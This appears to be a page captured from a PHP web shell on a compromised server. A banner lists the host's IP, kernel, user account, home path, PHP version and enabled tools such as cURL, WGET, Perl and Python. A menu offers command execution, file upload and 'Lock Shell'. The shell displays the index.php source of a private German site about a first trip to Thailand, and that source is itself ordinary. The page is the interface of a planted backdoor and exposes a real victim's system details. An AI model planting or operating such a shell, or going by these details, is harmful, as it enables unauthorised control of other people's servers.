gzuncompress
|
Server IP : 172.19.0.2 / Your IP : 216.73.216.178 Web Server : Apache/2.4 System : Linux 880f91b28fd7 5.15.0-117-generic #127~20.04.1-Ubuntu SMP Thu Jul 11 15:36:12 UTC 2024 x86_64 User : tomlinde ( 155017) PHP Version : 5.6.40 Disable Function : dl, syslog, opcache_get_status MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0700) : /home/webpages/lima-city/tomlinde/html/1trip/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
|---|
<?php
//<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>
<title>Ihre erste Reise nach Thailand</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="author" content="Tom Lindemann"/>
<meta name="keywords" content="Thailand, erste Reise, first Trip,1.trip,"/>
<meta name="description" content="Tips für die erste Reise nach Thailand">
<meta name="author" content="Tom Lindemann"/>
<link rel="shortcut icon" type="image/x-icon" href="image/favicon.ico" />
<link rel="stylesheet" type="text/css" href="style.css"/>
</head>
<body>
<div id="container">
<div id="logo">
<div class="logo01">Ihre erste Reise</div>
<div class="logo02">nach</div>
<div class="logo01">Thailand<br/></div>
</div>
<div id="menu_container">
<div id="menu">
<?php
if(array_key_exists('page', $_GET)){
if($_GET['page'] == "start") echo '<a class="menu_selected" href="index.php?page=start">Startseite</a>';
else echo '<a href="index.php?page=start">Startseite</a>';
if($_GET['page'] == "xxx") echo '<a class="menu_selected" href="index.php?page=xxx">xxx</a>';
else echo '<a href="index.php?page=xxx">xxx</a>';
if($_GET['page'] == "Forum") echo '<a class="menu_selected" href="index.php?page=Forum">Forum</a>';
else echo '<a href="index.php?page=Forum">Forum</a>';
if($_GET['page'] == "kontakt") echo '<a class="menu_selected" href="index.php?page=kontakt">Kontakt</a>';
else echo '<a href="index.php?page=kontakt">Kontakt</a>';
if($_GET['page'] == "impressum") echo '<a class="menu_selected" href="index.php?page=impressum">Impressum</a>';
else echo '<a href="index.php?page=impressum">Impressum</a>';
} else {
echo '<a class="menu_selected" href="index.php?page=start">Startseite</a>'.
'<a href="index.php?page=">xxx</a>'.
'<a href="http://1482.eguestbook.de/">Forum</a>'.
'<a href="index.php?page=kontakt">Kontakt</a>'.
'<a href="index.php?page=impressum">Impressum</a>';
}
?>
</div>
</div>
<div id="content">
<!-- Inhalt -->
<?php include("content.php");?>
<!-- ENDE Inhalt -->
</div>
</div>
<div>powered by <a href="http://www.toms-web-design.de" target="_blank">Toms-Web-Design.de</a></div>
</body>
</html>